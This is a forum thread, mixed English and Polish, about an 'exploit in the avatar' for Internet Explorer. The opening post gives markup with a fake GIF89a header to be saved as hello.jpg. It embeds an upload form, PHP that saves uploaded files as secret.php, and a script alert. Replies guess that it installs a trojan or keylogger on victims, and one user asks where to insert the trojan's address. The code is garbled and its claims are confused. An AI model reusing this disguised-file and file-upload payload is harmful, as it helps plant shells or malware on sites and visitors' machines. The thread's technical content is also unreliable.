This can perhaps leed to a vonerability. (only works i internet explorer)
open notedpad and save the following as hello.jpg
<GIF89a?8??f???>
<html>
<head>
<title>Secret :: gifz</title>
</head>
</body>
<center>
<table width=75% border=1>
<tr>
<td bgcolor=gray>
<center>[u][b]By SecreT</font>[/b][/u]</center>
<FORM ENCTYPE="multipart/form-data" ACTION="upload.php" METHOD="POST">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
Send this file: <INPUT NAME="userfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<?
move_uploaded_file($userfile, "secret.php");
?>
</body>
</html></body></html>
<html><body><script>alert('hello:D');</script></body></html>
Dokładnie, coś Ci się chyba pochrzaniło :>Originally posted by Patrykuss
O czym ty gadasz? Pmyliłeś tematy czy co? Tutaj jest o exploicie w avatarze. Nigdzie w całym topicu nawet nie widzę ciągu znaków exe.
Originally posted by yras
@up
myslalem tak samo ale chyba nie
moze ktos wytlumaczyc co ten exloit robi ;p ? :jem2:
Originally posted by RyBek
jak dobrze rozumiem expolot jest to skrypt skury zapisuje sie na kopie ofiary i sciaga tam naszego trojana/keyloger/itp.
To w takiem tazie gdzie mam wpisac w kodzie adres trojana/keyloger/itp.
Jak Dobrze to rozumiem